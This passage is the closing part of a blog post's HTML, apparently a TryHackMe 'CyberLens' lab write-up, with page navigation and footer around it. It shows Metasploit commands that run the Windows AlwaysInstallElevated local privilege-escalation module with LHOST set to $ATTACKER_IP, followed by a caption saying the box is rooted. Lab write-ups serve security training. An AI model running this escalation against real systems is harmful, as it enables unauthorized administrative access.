</pre></td><td class="rouge-code"><pre>msf6 <span class="o">&gt;</span> use exploit/windows/local/always_install_elevated 
</pre></td></tr></tbody></table></code></div></div>

<p>Some parameters need to be configured.</p>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>msf6 exploit<span class="o">(</span>windows/local/always_install_elevated<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>SESSION 1
msf6 exploit<span class="o">(</span>windows/local/always_install_elevated<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>LHOST <span class="nv">$ATTACKER_IP</span>
msf6 exploit<span class="o">(</span>windows/local/always_install_elevated<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>LPORT 9999
msf6 exploit<span class="o">(</span>windows/local/always_install_elevated<span class="o">)</span> <span class="o">&gt;</span> run
</pre></td></tr></tbody></table></code></div></div>
<p><a href="/assets/img/writeups/thm/cyberlens/root.txt.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/cyberlens/root.txt.png" alt="exploit_root"  loading="lazy"></a>
<em>And we’ve rooted the room</em></p>

<h1 id="reverse-footnote">Reverse footnote</h1>

<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:footnote">
      <p><a href="https://www.tenable.com/audits/items/CIS_Microsoft_Windows_10_Enterprise_v3.0.0_L1.audit:0579e54650069622ac4fc5e965241d40">source</a> (tenable) <a href="#fnref:footnote" class="reversefootnote" role="doc-backlink">&#8617;&#xfe0e;</a></p>
    </li>
  </ol>
</div>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/writeups/">Writeups</a>,
          <a href="/categories/tryhackme/">TryHackMe</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/writeups/"
            class="post-tag no-text-decoration"
          >writeups</a>
        
          <a
            href="/tags/tryhackme/"
            class="post-tag no-text-decoration"
          >tryhackme</a>
        
          <a
            href="/tags/metasploit/"
            class="post-tag no-text-decoration"
          >metasploit</a>
        
          <a
            href="/tags/windows/"
            class="post-tag no-text-decoration"
          >windows</a>
        
          <a
            href="/tags/windows-privesc/"
            class="post-tag no-text-decoration"
          >windows-privesc</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=CyberLens%20-%20NullBrunk&url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fthm-cyberlens%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=CyberLens%20-%20NullBrunk&u=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fthm-cyberlens%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fthm-cyberlens%2F&text=CyberLens%20-%20NullBrunk" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/ftpy/">FTPy</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/arpspoofer/">arpspoofer</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/wpsh/">wpsh</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/thm-cyberlens/">CyberLens</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/thm-blog/">Blog</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hacking-tools/">hacking-tools</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/tryhackme/">tryhackme</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/writeups/">writeups</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/metasploit/">metasploit</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/windows/">windows</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/active-directory/">active-directory</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/asreproast/">asreproast</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/golden-ticket/">golden-ticket</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hacking/">hacking</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/impacket/">impacket</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-1 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  
    
  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/thm-attacktivedirectory/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735488000"
  data-df="ll"
  
>
  Dec 29, 2024
</time>

              <h4 class="pt-0 my-2">Attacktive Directory</h4>
              <div class="text-muted">
                <p>99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/thm-blog/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735401600"
  data-df="ll"
  
>
  Dec 28, 2024
</time>

              <h4 class="pt-0 my-2">Blog</h4>
              <div class="text-muted">
                <p>Billy Joel made a Wordpress blog!</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

    
      <a href="https://github.com/NullBrunk">Anas</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.3"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hacking-tools/">hacking-tools</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/tryhackme/">tryhackme</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/writeups/">writeups</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/metasploit/">metasploit</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/windows/">windows</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/active-directory/">active-directory</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/asreproast/">asreproast</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/golden-ticket/">golden-ticket</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hacking/">hacking</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/impacket/">impacket</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

